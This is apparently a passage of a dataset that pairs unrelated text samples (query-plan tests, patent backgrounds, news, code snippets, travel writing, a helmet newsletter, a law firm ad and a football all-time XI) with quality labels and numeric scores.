LogicalTableScan(table=[[CATALOG, SALES, BONUS]]) ]]> </Resource> </TestCase> <TestCase name="testMatchLimitOneBottomUp"> <Resource name="sql"> <![CDATA[(select name from dept union select ename from emp) union (select ename from bonus)]]> </Resource> <Resource name="planBefore"> <![CDATA[ LogicalUnion(all=[false]) LogicalUnion(all=[false]) LogicalProject(NAME=[$1]) LogicalTableScan(table=[[CATALOG, SALES, DEPT]]) LogicalProject(ENAME=[$1]) LogicalTableScan(table=[[CATALOG, SALES, EMP]]) LogicalProject(ENAME=[$0]) LogicalTableScan(table=[[CATALOG, SALES, BONUS]]) ]]> </Resource> <Resource name="planAfter"> <![CDATA[ LogicalUnion(all=[false]) LogicalAggregate(group=[{0}]) LogicalUnion(all=[true]) LogicalProject(NAME=[$1]) LogicalTableScan(table=[[CATALOG, SALES, DEPT]]) LogicalProject(ENAME=[$1]) LogicalTableScan(table=[[CATALOG, SALES, EMP]]) LogicalProject(ENAME=[$0]) LogicalTableScan(table=[[CATALOG, SALES, BONUS]]) ]]> </Resource> </TestCase> <TestCase name="testRuleClass"> <Resource name="sql"> <![CDATA[(select name from dept union select ename from emp) intersect (select fname from customer.contact)]]> </Resource> <Resource name="planBefore"> <![CDATA[ LogicalIntersect(all=[false]) LogicalUnion(all=[false]) LogicalProject(NAME=[$1]) LogicalTableScan(table=[[CATALOG, SALES, DEPT]]) LogicalProject(ENAME=[$1]) LogicalTableScan(table=[[CATALOG, SALES, EMP]]) LogicalProject(FNAME=[$1]) LogicalTableScan(table=[[CATALOG, CUSTOMER, CONTACT]]) ]]> </Resource> <Resource name="planAfter"> <![CDATA[ LogicalIntersect(all=[false]) LogicalUnion(all=[false]) LogicalProject(NAME=[CAST($0):VARCHAR(20) CHARACTER SET "ISO-8859-1" COLLATE "ISO-8859-1$en_US$primary" NOT NULL]) LogicalProject(NAME=[$1]) LogicalTableScan(table=[[CATALOG, SALES, DEPT]]) LogicalProject(ENAME=[$1]) LogicalTableScan(table=[[CATALOG, SALES, EMP]]) LogicalProject(FNAME=[CAST($0):VARCHAR(20) CHARACTER SET "ISO-8859-1" COLLATE "ISO-8859-1$en_US$primary" NOT NULL]) LogicalProject(FNAME=[$1]) LogicalTableScan(table=[[CATALOG, CUSTOMER, CONTACT]]) ]]> </Resource> </TestCase> <TestCase name="testSubprogram"> <Resource name="sql"> <![CDATA[select upper(ename) from (select lower(ename) as ename from emp)]]> </Resource> <Resource name="planBefore"> <![CDATA[ LogicalProject(EXPR$0=[UPPER(LOWER($1))]) LogicalTableScan(table=[[CATALOG, SALES, EMP]]) ]]> </Resource> <Resource name="planAfter"> <![CDATA[ LogicalCalc(expr#0..8=[{inputs}], expr#9=[LOWER($t1)], expr#10=[UPPER($t9)], EXPR$0=[$t10]) LogicalTableScan(table=[[CATALOG, SALES, EMP]]) ]]> </Resource> </TestCase> <TestCase name="testRuleDescription"> <Resource name="sql"> <![CDATA[select name from sales.dept where deptno=12]]> </Resource> <Resource name="planBefore"> <![CDATA[ LogicalProject(NAME=[$1]) LogicalFilter(condition=[=($0, 12)]) LogicalTableScan(table=[[CATALOG, SALES, DEPT]]) ]]> </Resource> <Resource name="planAfter"> <![CDATA[ LogicalProject(NAME=[$1]) LogicalCalc(expr#0..1=[{inputs}], expr#2=[12], expr#3=[=($t0, $t2)], proj#0..1=[{exprs}], $condition=[$t3]) LogicalTableScan(table=[[CATALOG, SALES, DEPT]]) ]]> </Resource> </TestCase> <TestCase name="testGroup"> <Resource name="sql"> <![CDATA[select upper(name) from dept where deptno=20]]> </Resource> <Resource name="planBefore"> <![CDATA[ LogicalProject(EXPR$0=[UPPER($1)]) LogicalFilter(condition=[=($0, 20)]) LogicalTableScan(table=[[CATALOG, SALES, DEPT]]) ]]> </Resource> <Resource name="planAfter"> <![CDATA[ LogicalCalc(expr#0..1=[{inputs}], expr#2=[UPPER($t1)], expr#3=[20], expr#4=[=($t0, $t3)], EXPR$0=[$t2], $condition=[$t4]) LogicalTableScan(table=[[CATALOG, SALES, DEPT]]) ]]> </Resource> </TestCase> </Root> | Low | [
0.503311258278145,
28.5,
28.125
] |
Disk array devices, such as for example, a RAID (Redundant Arrays of Inexpensive Disk) set, have become popular. The RAID storage unit secures data reliability as an entire system with a data redundancy configuration established among disks in a RAID group consisting of a plurality of the disks (see, for example, Japanese Laid-open Patent Publication No. 2002-222063 and No. 2009-116783). Even if a failure occurs in some disks in the RAID group and a fallback occurs in the data redundancy of the RAID group, the RAID storage unit can cause the data content stored in the failed disk(s) to be restored in a destination disk, such as a spare disk and a replaced normal disk. A widely used restoration process is, for example, a data reconstruction process (hereinafter, referred to as a “rebuild process”). Thus, even if a failure occurs in some disks and a fallback occurs in the data redundancy in the RAID group, the RAID storage unit can recover the redundancy through the rebuild process to cause the data content in the failed disk to be restored in the destination disk. In particular, in the rebuild process, the data content stored in the failed disk is sequentially restored from the first block to the last block of the actual storage space with reference to the failed disk and disks other than the failed disk in the RAID group. In the rebuild process, the data content of the failed disk can be reconstructed and restored in the destination disk by sequentially storing the restored data in the actual storage space in the destination disk. Upon detection of a write request issued by a host for new data with respect to a virtual volume to be accessed, the RAID storage unit allocates, as the virtual volume, a logical volume corresponding to an actual storage space of the disk which exists in the same RAID group in accordance with the volume capacity of the new data. The virtual volume is not allocated from the actual storage space during creation of the logical volume recognized by the host, but allocated sequentially from the actual storage space corresponding to a range of an I/O request upon detection of an I/O request of a write request issued by the host. The RAID storage unit causes the new data of the write request to be stored as the actual data in the actual storage space of the disk corresponding to the logical storage space allocated to the virtual volume. FIG. 14 illustrates a relationship between a logical storage space and an actual storage space of the RAID groups when a virtual volume is used. The virtual volume randomly includes, in the actual storage space in the RAID group, stored spaces in which the actual data is stored and spaces in which no actual data is stored (i.e., a zero data space). In a rebuild process for a virtual volume in related art RAID storage units, data in the actual storage space of the failed disk is sequentially restored from the first block to the last block and the restored data is reconstructed in the actual storage space in the destination disk. Thus, in the related art RAID storage units, since the data content stored in the actual storage space of the failed disk is caused to be restored in the actual storage space of the destination disk, the data redundancy in the RAID group can be recovered. In such related art RAID storage units, data in the first block to the last block of the destination disk is uniformly reconstructed irrespective of the concept of the stored space in which the actual data has been stored and the space in which no data is stored in the actual storage space of the failed disk. Recently, disks with increasingly larger storage capacity are being developed. The related art RAID storage units require significantly long time to restore data uniformly and sequentially from the first block to the last block in the disk of large capacity and reconstructs the data content in the destination disk. It therefore takes long time to recover data redundancy in the RAID group. | Mid | [
0.5938242280285031,
31.25,
21.375
] |
One America News Network FILE PHOTO: May 13, 2018; Detroit, MI, USA; Seattle Mariners second baseman Robinson Cano (22) is checked by medical staff and manager Scott Servais (29) after being hit by a pitch in the third inning against the Detroit Tigers at Comerica Park. Mandatory Credit: Rick Osentoski-USA TODAY Sports August 15, 2018 Robinson Cano is back with the Seattle Mariners, having finished his 80-game suspension for violating Major League Baseball’s joint drug agreement, and he has… FILE PHOTO: A view of the Goldman Sachs stall on the floor of the New York Stock Exchange in New York, U.S. on July 16, 2013. REUTERS/Brendan McDermid/File Photo August 14, 2018 By Jonathan Stempel NEW YORK (Reuters) – A federal judge on Tuesday said Goldman Sachs Group Inc <GS.N> shareholders may again pursue class-action claims that the bank concealed conflicts of interest when creating risky subprime securities before the 2008 financial crisis. U.S. District… U.S. President Donald Trump delivers remarks during a meeting with supporters in Utica, New York, U.S., August 13, 2018. REUTERS/Carlos Barria August 14, 2018 By Brendan Pierson NEW YORK (Reuters) – Advocacy groups on Tuesday filed a lawsuit challenging the decision by President Donald Trump’s administration to allow Arkansas to impose work requirements on Medicaid recipients in the state. The lawsuit, filed against the U.S. Department of Health and Human Services in federal court in… Traders work on the floor of the New York Stock Exchange (NYSE) in New York, U.S., July 24, 2018. REUTERS/Brendan McDermid August 14, 2018 (Reuters) – Wall Street’s three major indexes rose on Tuesday with the S&P 500 posting its strongest gain in three weeks as a string of healthy earnings boosted investor optimism and a rebound in the Turkish lira eased contagion fears. The S&P 500 and the Dow Jones Industrial Average ended four-day… FILE PHOTO: Aug 14, 2018; Mason, OH, USA; Stefanos Tsitsipas (GRE) returns a shot against David Goffin (BEL) in the Western and Southern tennis open at Lindner Family Tennis Center. Mandatory Credit: Aaron Doster-USA TODAY Sports August 14, 2018 (Reuters) – Stefanos Tsitsipas was unable to build on his magical Toronto run as the Greek upstart fell 7-5 6-3 to Belgian David Goffin in first-round action at the Cincinnati Masters on Tuesday. Tsitsipas, who strung… FILE PHOTO: Aug 23, 2016; Seattle, WA, USA; Seattle Mariners second baseman Robinson Cano (22) hits a single against the New York Yankees during the fourth inning at Safeco Field. Mandatory Credit: Joe Nicholson-USA TODAY Sports / Reuters Picture Supplied by Action Images August 14, 2018 Robinson Cano is back with the Seattle Mariners, having finished his 80-game suspension for violating Major League Baseball’s joint drug agreement. Cano was reinstated from the restricted list Tuesday…. FILE PHOTO: A woman passes by the Nasdaq Market Site in Times Square in New York City, U.S., February 7, 2018. REUTERS/Brendan McDermid/File Photo August 14, 2018 By John McCrank NEW YORK (Reuters) – Nasdaq Inc <NDAQ.O> and a Wall Street watchdog will raise fees for private stock trading platforms, such as “dark pools,” that report trade executions to a Nasdaq-run entity, in response to higher operational costs and off-exchange trading volumes, according to a… FILE PHOTO: The Sprint logo is displayed on a a screen on the floor of the New York Stock Exchange (NYSE) in New York City, U.S., April 30, 2018. REUTERS/Brendan McDermid/File Photo August 14, 2018 By Sheila Dang (Reuters) – Sprint Corp <S.N> said Tuesday it has partnered with phone manufacturer LG Electronics Inc <066570.KS> to launch a 5G smartphone in the first half of next year, marking the first 5G device deal for the… FILE PHOTO: A Tesla sales and service center is shown in Costa Mesa, California, U.S., June 28, 2018. REUTERS/Mike Blake/File Photo August 14, 2018 By Supantha Mukherjee (Reuters) – Tesla Inc’s board <TSLA.O> named a special committee of three directors on Tuesday to evaluate possibly taking the electric carmaker private, although it said it had yet to see a firm offer from the company’s chief executive, Elon Musk. The committee will be tasked with evaluating… | Low | [
0.48865979381443303,
29.625,
31
] |
1. Field of the Invention This invention relates generally to the field of holography and more particularly to a novel holographic recording unit and to a compact mobile holographic instrument embodying the recording unit for evaluating the structural integrity of load-bearing structures utilizing holographic interferometry. 2. Prior Art As will become readily apparent from the ensuing description, the recording unit of the invention may be utilized for general purpose holographic recording and the holographic instrument may be utilized to evaluate the structural integrity of virtually any structure. However, the recording unit and holographic instrument are particularly adapted for evaluating the integrity of aircraft structures and other similar redundant load-bearing structures, that is load-bearing structures having multiple load paths. For this reason, the invention will be described in connection with this particular use. In view of the above noted broader utility of the instrument, it will be understood that this described application involving aircraft inspection is purely illustrative and not limiting in nature. An aircraft wing is a highly redundant load-bearing structure having multiple internal load-bearing members providing multiple load paths through the structure. The wing structure is designed to sustain loads substantially in excess of those which are encountered in normal aircraft service. Over a period of time, however, a wing structure is prone to loss of its structural integrity, that is weakening of its load-bearing members due to fatigue damage, stress corrosion cracking, and other causes. Fatigue damage, of course, involves cracking of the wing load-bearing members, loosening of joints and rivets, and other weakening of the wing structure caused by the frequent load reversals which occur in the structure during flight, landing, and takeoff. Stress corrosion cracking occurs in aircraft which operate in an ocean environment and is caused by the corrosive action of salt water. In order to assure continued safe aircraft operation, therefore, it is necessary to periodically evaluate the structural integrity of aircraft wings, as well as other parts of the aircraft, of course. A variety of inspection and testing techniques have been devised to evaluate the structural integrity of aircraft wings and other aircraft parts. One common inspection technique, for example, involves installing accelerometers on selected structural members for counting stress reversals experienced by the members. From these counts and a statistical model bases on the behavior of the particular aircraft structure of interest and statistical considerations regarding the distribution and size of defects, fatigue damage may be predicted. At appropriate times, the wing structure may be disassembled and subjected to actual fatigue inspection using x-rays or other nondestructive inspection techniques and/or fatigue damage tests. This method of evaluating structural integrity, however, is extremely costly and time consuming. The same applies to the current methods of inspecting aircraft wings and other structures for stress corrosion cracks, which methods require stripping all paint from the surfaces to be inspected, inspection of the surfaces by ultrasonic or other inspection techniques, and repainting of the surfaces. Accordingly, there is a need for an improved nondestructive inspection technique for evaluating the structural integrity of load-bearing structures, particularly highly redundant load-bearing structures, such as aircraft wings and other aircraft structures and parts. The earlier mentioned copending application Ser. No. 456,998, provides such an improved inspection or structural integrity verification technique, and apparatus for its practice, involving holographic interferometry. This improved inspection technique is based on the fact that any loss of structural integrity, that is weakening, of a load-bearing structure due to fatigue damage, stress corrosion cracking, or other causes reduces the effective stiffness of the structure. Such reduction in stiffness, in turn, changes the deformations which the structure will experience in response to any given loading or stressing of the structure. The improved inspection technique utilizes holographic interferometry to detect such distortion changes and thereby changes in the structural integrity of the test structure. According to the improved inspection technique, a load-bearing structure is periodically inspected by establishing in the structure two successive predetermined stress conditions of differing magnitude and recording on the same holographic recording medium two successive holograms of the structure while the latter is in these stress conditions. The resulting holographic recording is an interferogram which may be holographically reconstructed to produce a deformation fringe pattern whose fringe lines depict or represent the deformations occurring in the structure due to the change from one stress condition to the other. This inspection procedure is repeated periodically using the same stress conditions, and the deformation fringe patterns of the successive interferograms are compared to determine differences, if any, in the fringe patterns. Such differences, if any, between the successive fringe patterns are indicative of a change in the structural integrity or stiffness of the structure in the intervals between recording of the interferograms. The two stress conditions required for each periodic inspection of the structure may be established by either or both static or dynamic loading of the structure. According to the static loading procedure, the structure to be inspected is subjected to a given static load, which may be simply the weight of the structure or an additional static load, during recording of the first hologram. The static load on the structure is then changed and the second hologram is recorded. According to the dynamic loading procedure, an impact or impulsive load is applied to the structure to effect propagation of stress waves through the structure. These stress waves establish a first stress in the structure when the first hologram is recorded and a second stress condition when the second hologram is recorded. According to the combined static and dynamic loading procedure, the structure is subjected to a constant static load in addition to the impulsive load. The inspection apparatus of the copending application Ser. No. 456,998 for practicing the inspection technique of the application comprises a holographic recording unit for recording successive holograms of a selected region of the structure under inspection, an impulser for dynamically loading the structure to propagate stress waves through the region, and control means for operating the recording unit and impulser in timed relation such that each pair of successive holograms are recorded under different stress conditions in the region of interest of the structure to produce a holographic interferogram defining a deformation fringe pattern. As described above, the deformation fringe patterns of successive interferograms are compared to determine a change, if any, in the structural integrity of the structure. | High | [
0.658354114713216,
33,
17.125
] |
/* * POJ 1740: A New Stone Game * 题意：n堆石头，两人轮流选取一堆，先扔掉至少1个，再将剩下的选取任意个或不选，转移到任意其他一个或多个堆。问先手胜负。 * 类型：NP博弈 * 算法：若包含相同石头数的堆都为偶数堆，则该状态为必败态。因为此时游戏必然破坏该必败条件，但下一轮一定可以通过从对称的堆里进行相同的操作使必败条件满足。 */ #include <cstdio> #include <algorithm> using namespace std; int a[10]; int main() { int n; while (scanf("%d", &n) != EOF && n) { bool ans = 1; for (int i = 0; i < n; ++i) scanf("%d", &a[i]); if (n % 2 == 0) { sort(a, a + n); int i; for (i = 0; i < n; i += 2) { if (a[i] != a[i + 1]) break; } if (i == n) ans = 0; } printf("%d\n", ans); } return 0; } | Mid | [
0.5742857142857141,
25.125,
18.625
] |
package version import ( "context" "fmt" "os" "strings" "github.com/google/go-github/v28/github" log "github.com/sirupsen/logrus" "github.com/stripe/stripe-cli/pkg/ansi" ) // Version of the CLI. // This is set to the actual version by GoReleaser, identify by the // git tag assigned to the release. Versions built from source will // always show master. var Version = "master" // Template for the version string. var Template = fmt.Sprintf("stripe version %s\n", Version) // CheckLatestVersion makes a request to the GitHub API to pull the latest // release of the CLI func CheckLatestVersion() { // master is the dev version, we don't want to check against that every time if Version != "master" { s := ansi.StartNewSpinner("Checking for new versions...", os.Stdout) latest := getLatestVersion() ansi.StopSpinner(s, "", os.Stdout) if needsToUpgrade(Version, latest) { fmt.Println(ansi.Italic("A newer version of the Stripe CLI is available, please update to:"), ansi.Italic(latest)) } } } func needsToUpgrade(version, latest string) bool { return latest != "" && (strings.TrimPrefix(latest, "v") != strings.TrimPrefix(version, "v")) } func getLatestVersion() string { client := github.NewClient(nil) rep, _, err := client.Repositories.GetLatestRelease(context.Background(), "stripe", "stripe-cli") l := log.StandardLogger() if err != nil { // We don't want to fail any functionality or display errors for this // so fail silently and output to debug log l.Debug(err) return "" } return *rep.TagName } | Low | [
0.532258064516129,
33,
29
] |
CruzTools Stagehand Tech Kit This is the CruzTOOLS Stagehand Compact Tech Kit for bassists and guitarists. Basically all you need for most bridge, truss rod, tremolo, and nut adjustments on nearly all makes and models of guitars.The Stagehand set also includes a capo and 15-blade thickness gauge with integrated ruler, a string winder, and a smaller version of the GrooveTech string cutters. | High | [
0.671717171717171,
33.25,
16.25
] |
Baqueano (cowboy) at the Las Torres Hotel enjoys his early morning strong tea. Baqueano (cowboy) at the Las Torres Hotel enjoys his early morning strong tea. Mark Furler THE glossy brochure for Hotel Las Torres in southern Chile's Patagonia says privileged location. Driving up to the entrance you realise they are not overstating it one bit. With the most majestic mountains as its backdrop, this is not just a hotel. It's a spiritual experience. One where you take in the best of creation - some of the most amazing landscapes in the world - in a remote, cold, natural frontier that seems a million miles away from the rest of the world. Condors soar over snow-covered mountains dotted with llama like guanacos. Waterfalls roar near the most still turquoise lakes while spring lambs climb the steppe country. The mountain climbing is breathtaking. The horse riding is like a scene from the Man from Snowy River. Images from Patagonia, Chile: Las Torres Hotel Mark Furler Situated at the base of the Paine towers, Hotel Las Torres is a story in itself - one of a family who overcame incredible odds to carve out a tourism venture at the end of the world. "In a landscape painted by God where you can hear the silence, Antonio Kusanovic Senkovic, following in the pioneering footsteps of his father acquired the beautiful Estancia (ranch) Cerro Paine in 1979, to engage in farming,'' the family history reads. Together with his wife and four children, the family worked with more than 600 cattle into the 1990s until the imposing Torres del Paine began to attract worldwide adventurers. Despite the tyranny of distance, lack of supplies and basic services like power, Antonio established the Hosteria las Torres in 1992 with 10 rooms as part of the reconditioned ranch. Since then the hotel has expanded to 84 rooms, together with a spa, restaurant and a stable offering 150 horses suitable for all ages and abilities. Baqueano Osvaldo Mella looks after a hundred and fifty horses at Las Torres Hotel Mark Furler Riding the horses towards the base of the granite towers emerging above the snow-capped Andes is a 'pinch me, I can't believe I am doing this' experience. We took three separate rides, taking in forests, spectacular mountains, crossing streams and overseeing some of the most stunning lakes on the planet. Over six days, I took more than 2000 photos from the blood-red sun rising on the towers to the ice formations and glaciers on a boat trip on Grey Lake. The hotel offers more than a dozen full and half day excursions including the Full Paine exploring the best features of the Torres del Paine National Park which was established in 1959 and recognised as a UNESCO world biosphere reserve in 1978. APN News and Media group digital editor Mark Furler with the Torres del Paine and Lake Pehoe in the background. Mark Furler The English speaking guides are very friendly while along the way we met travellers from the US, Israel, Germany, Japan, and even Australia. It really is a world destination with 60% of the 150,000 visiting the park each year being from overseas. One of the newest activities is Baqueanos for One Day where you join the hotel's cowboys on a day which includes rounding up the horses at dawn, a good Mate tea with local pastry, visiting beautiful landscapes, and lunch. Sarmiento Lake features a collection of calcium carbonate formations. Guanacos enjoy the view. Mark Furler The food at the hotel was superb with beautiful beef and lamb dishes, sweet Chilean red wines, organic produce from the hotel farm, and delicate desserts. The hotel's all-inclusive package includes meals, alcoholic and non-alcoholic drinks, daily transfers and airport transfers. The writer was a guest of Las Torres Hotel and Travel Projects, Central & South America Travel Specialist. On horseback heading to the base of the Paine towers. Mark Furler About Hotel Las Torres Flights from Sydney: LAN & Qantas offer direct flights to the capital of Chile, Santiago (13 hours) Nearest airport: Puerto Natales, Chile How to get there? Transfer is included in the all-Inclusive packages to and from Puerto Natales & Punta Arenas in Chile and El Calafate in Argentina. Number of rooms: 84 (72 Superior Rooms, 10 Standard & 2 Suites) More information: www.lastorres.com Photos View Photo Gallery The deal Travel Projects offer for Hostel Las Torres is (6Days/5Nights, from AU$2,107 per person): http://www.travelprojects.com.au/tours/torres-del-paine-and-perito-moreno-glacier-tour.aspx Recommended hotels http://www.lastarriahotel.com http://www.hotelcabodehornos.com/ http://vitacura.atton.com Further information: Travel Projects, Central & South America Travel Specialist Ph: 1300 662 533 Email: [email protected] | High | [
0.6722925457102671,
29.875,
14.5625
] |
Bicycle Helmet Safety Institute The Helmet Update Volume 32, #2, September 17, 2014 Interbike Report Last week we spoke with reps of more than 60 helmet brands at Interbike, documenting the new models for 2015. The big news is that MIPS is arriving in 2015 in a big way. MIPS is short for Multi-directional Impact Protection System. A Swedish company, it has revived and patented the slip plane concept, using a second layer in the helmet to help the head rotate slightly on impact. The hope is to reduce the rotational component of an impact, a prime brain injury mechanism and related to concussion. For the 2015 model year, many more manufacturers have MIPS models. Bell has bought "a substantial stake" in the MIPS company, and has a slew of Bell and Giro models with MIPS. Bell tells us they wanted good access to the MIPS team expertise to develop their helmets. Aside from POC's first model, everybody is implementing MIPS by adding a thin layer of polycarbonate plastic inside the normal liner. Most of them leave a large uncovered space in the rear where stabilizers attach. We are not convinced that MIPS makes sense. Bike helmets are not closely coupled to the head, and will move on impact anyway. The MIPS layer takes up space inside the helmet, can interfere with ventilation and does not cover the rear of most models. We don't think you need to scrap your current helmet for a MIPS model. Our page on it is at www.helmets.org/mips.htm. Manufacturers have some new 2015 models, but most changes are incremental. There are more bright colors, more magnetic buckles, more "compact" road helmets with fewer extreme rear points. Smith has a second model out using their Koroyd/EPS liner. Shred has a model with a thin layer of vinyl nitrile foam interspersed with dots of EPS. Leatt has a model with spinning squishy foam disks at points on the liner that they say will disperse energy sideways. Uvex is retesting some of their older models. An Asian company is working on a "mind control helmet" that will turn on lights, cameras, etc. by thought control. We will have more detail eventually when our Helmets for 2015 page is up. | Low | [
0.506097560975609,
31.125,
30.375
] |
Compensation For Victims Of Bicycle And Pedestrian Accidents To someone riding a bicycle or walking on the street, being hit by a vehicle moving at any speed can result in serious or fatal injuries. If you or a loved one has suffered injuries in a bicycle or pedestrian accident, you will probably face enormous medical bills and a long recovery. How will you ever be able to get the medical care and rehabilitation services you need to recover? Conlon Tarker, P.C., is a law firm dedicated to helping injured people obtain fair compensation for medical expenses, lost income, and pain and suffering. We are experienced personal injury advocates who understand how to use the law to help our clients get the help they need. Strong Advocates for Injured People The attorneys at our firm have many years experience representing people in the Butler area and Western Pennsylvania who have been injured in bicycle accidents, pedestrian accidents and auto accidents. We will use our experience and knowledge to help you get the medical care and compensation you need to rebuild your life. Helping You Get the Care You Need Our firm will put a priority on obtaining compensation to pay for the medical care and rehabilitation services you need — now and in the future. Our Lawyers have considerable experience in cases involving life-changing injuries such as spinal cord injury and brain injury. Working with your doctor or other medical specialists, we can identify the medical treatment and services you need — and then use the legal system to help you get the compensation needed to pay for immediate and long-term care. Do not delay — call us today toll free at 888-312-5366 for a free initial consultation. At Conlon Tarker, P.C., we believe in performance, not promises. If you require experienced legal assistance in getting compensation for a bicycle or pedestrian accident, contact our firm today. We offer free initial consultations and do not collect an attorney fee unless you are compensated for your injuries. The use of the Internet or this form for communication with the firm or any individual member of the firm does not establish an attorney-client relationship. Confidential or time-sensitive information should not be sent through this form. | High | [
0.6890982503364731,
32,
14.4375
] |
>>== MODE ==>> citation <<== MODE ==<< >>== ABBREVIATIONS ==>> { "default": { "title": { "Journal of Irreproducible Results": "J. Irrep. Res." } } } <<== ABBREVIATIONS ==<< >>== RESULT ==>> Minpō Japanese Civil Code. <<== RESULT ==<< >>===== CSL =====>> <style xmlns="http://purl.org/net/xbiblio/csl" class="note" version="1.0" default-locale="en-US-x-translit-ja-alalc97-x-translat-en"> <info> <id /> <title /> <updated>2009-08-10T04:49:00+09:00</updated> </info> <citation> <layout suffix="."> <text variable="title"/> </layout> </citation> </style> <<===== CSL =====<< >>===== INPUT =====>> [ { "id": "ITEM-1", "title": "民法", "type": "legislation", "multi":{ "_keys":{ "title":{ "ja-alalc97":"Minpō", "en":"Japanese Civil Code" } } } } ] <<===== INPUT =====<< | High | [
0.6934673366834171,
34.5,
15.25
] |
Real Madrid is arguably the most successful football club of all time. They’ve been European champions a record 12 times and Spanish champions a record 33 times across their illustrious history. And over the years, they’ve had a so-called Galactico culture. Throughout their history, Real Madrid have always boasted some of the greatest superstars of world football in their team. It is a trend that began in the 1950s, and is still going strong today. This makes selecting an all time Real Madrid XI a very challenging, yet enjoyable task. And that’s precisely what we’ve endeavoured to do here! Formation It is very tempting to go with the 3-2-5 (or even 3-3-1-3) formation employed by the great Real Madrid squad that dominated the game in the late 1950s. But despite the unparalleled success of Di Stefano and co., we’re opting for the more modern system of 4-2-3-1, something that has been regularly employed by Real Madrid teams over the past couple of decades. Goalkeeper The Contenders : Juan Alonso, Mariano García Remon, Iker Casillas GK : Iker Casillas This is undoubtedly one of the easiest choices in the line up. Iker Casillas is a goalkeeping legend, having won everything with both club and country. Coming up through the youth ranks, he was with the club for 16 seasons. He notched up 725 appearances for the club, second only to Raul, 3 Champions League titles, including as club captain in 2014, and 5 La Liga titles. The Back 4 The Contenders : Jose Santamaria, Jose Antonio Camacho, Chendo, Fernando Hierro, Fabio Cannavaro, Roberto Carlos, Sergio Ramos. Some really illustrious names vying for the 4 defensive spots – Santamaria was the rock at the back for the great Real Madrid team of the 50s. Hierro and Ramos have been great talismans and leaders for Real Madrid over very long periods of time, and both have had incredible footballing skills beyond just defending. Camacho had been a rock at left back for Real for 18 years, but he’s fighting for the spot with the more explosive Roberto Carlos, who spent 11 years at the club. Fabio Cannavaro was among the greatest defenders of his time, and even has a Ballon d’Or to show for it. However, he spent just 4 years at the club, a meagre number compared to his rivals here. So who make it to the back 4? LB : Roberto Carlos The robust Brazilian left-back has won 4 league titles and 3 Champions League titles in his 11 years at Real Madrid. As an attacking left back, there are few equals throughout history. Known for his pace, power and moments of sheer brilliance every now and then, Roberto Carlos just edges out the more solid Camacho for the left-back spot. CB : Jose Santamaria He was nicknamed ‘The Wall’ during his playing days, and with good reason. Santamaria was the often impenetrable last line of defence for the great Real Madrid team of the late 50s and early 60s. He featured 337 times for Los Blancos and lifted the European Cup 4 times. CB : Fernando Hierro Hierro was a sublime defender, with great positioning sense, anticipation and aerial ability. And there was a lot more to his game. He was very comfortable on the ball, and had a great range of passing, often starting moves for his team. And he had a fearsome shot, which helped him score an incredible 127 goals in his 601 appearances for Real. RB : Chendo Chendo spent his entire career at Real Madrid. He was an extremely dedicated player who stood out for his hard work and commitment to the cause. The industrious right back spent 16 seasons at the club, winning 7 La Liga titles and the 1998 Champions League. The Heart of Midfield The Contenders : Raymond Kopa, Pirri, Zinedine Zidane, Xabi Alonso Raymond Kopa could easily get a chance in most teams a lot further up the pitch. But the wealth of riches available further up the pitch across the history of Real Madrid means that he’s competing for a deeper lying role. Jose Pirri and Xabi Alonse can both provide some much needed solidity in the centre of the pitch, combined with a great range of passing. Of course, there’s also the great Zinedine Zidane. These 4 will be fighting for just 2 central midfield spots . LCM : Pirri José Martínez Sánchez, nicknamed Pirri, was known as the lungs of the Real Madrid team of the 60s and 70s. He was an incredibly versatile player who’s played as a central midfielder, defender, sweeper and even as a makeshift forward. He netted 172 goals during his 16 seasons with the club. He represented Madrid’s strength and honour, playing the 1971 final of the European Cup Winner’s Cup with his arm in a sling, and the 1975 Copa del Rey final with fever and a broken jaw. Pirri will no doubt provide some much needed solidity in front of the back 4 in this XI. He has received the club’s greatest distinction: the Laureate. RCM : Zinedine Zidane One of the all-time greats of football, Zidane was always going to find his spot in this team. He played in a variety of positions throughout midfield during his Real Madrid career, but we’d like to play him centrally, getting him on the ball as often as possible. Few people have ever had a better range and eye for passing and he would be the man pulling the strings from midfield for this team. And when required, the 3 time FIFA World Player of the Year can contribute with his fair share of goals, as is evident from the 2002 UEFA Champions League final, as well as the 1998 FIFA World Cup final. The Cutting Edge The Contenders : Alfredo di Stefano, Ferenc Puskas, Francisco Gento, Hugo Sanchez, Raul Gonzalez, Ronaldo Nazario, Cristiano Ronaldo An embarrassment of riches! There are so many great players who are not even being considered as contenders here. Di Stefano, Puskas, Hugo Sanchez, Raul Gonzalez, Ronaldo Nazario and Cristiano Ronaldo are some of the greatest goal scorers of all time, and all of them have multiple Pichichi Trophies to their name. The one remaining contender, Francisco Gento, is regarded as one of the all time great wingers, and had scored his fair share of goals to. LW : Cristiano Ronaldo The talisman of the modern day Real Madrid team, Cristiano Ronaldo slots into his preferred position on the left wing. He thrives on good quality service, and there’ll be no shortage of that in this team. Cristiano is Real Madrid’s all time top goalscorer with a goal ratio of about 1 goal per game. He is the all time Champions League top goalscorer, and the second highest goalscorer in La Liga behind only Lionel Messi. RW : Francisco Gento The legendary winger is now the honorary President of Real Madrid, following the passing away of Di Stefano. He appeared in a record 8 European finals for Real, winning a record 6. While he made his name playing mostly on the left wing, we had to give provide Cristiano Ronaldo the first dibs. So Gento occupies the right wing in this team. CF : Alfredo Di Stefano The Godfather of Real Madrid occupies the no. 10 role in this XI. Today Real Madrid would not be Real Madrid without the contributions of arguably their greatest ever player, Alfredo Di Stefano. Having him as the furthest forward was definitely an enticing option, but we ultimately decided to play him just behind the focal striker in this team. Despite playing as the focal point of the great Real Madrid team of the 50s, he contributed all across the pitch, and often dropped deep to help out in defence and midfield. He was a true all-round player, and many of those who played with him swear even now that he’s the best they’ve ever seen. ST : Ronaldo Nazario Leaving out Ferenc Puskas was a difficult choice. We’re going to miss the deadly Puskas-Di Stefano combination in this starting line-up. But in the end, we had to go for the 3 time World Player of the Year, Ronaldo. With his incredible pace, power and skill, Ronaldo produced a series of memorable performances for the whites. And at the head of the lineup, he completes this illustrious starting XI. Captain : Alfredo Di Stefano Manager : Vicente del Bosque Substitutes : Mariano García Remon Jose Antonio Camacho Sergio Ramos Xabi Alonso Raymond Kopa Ferenc Puskas Hugo Sanchez Do you agree with our team? Who would you rather have in your All Time Greatest XI of Real Madrid? Let us know in the comments below. | Mid | [
0.5918367346938771,
29,
20
] |
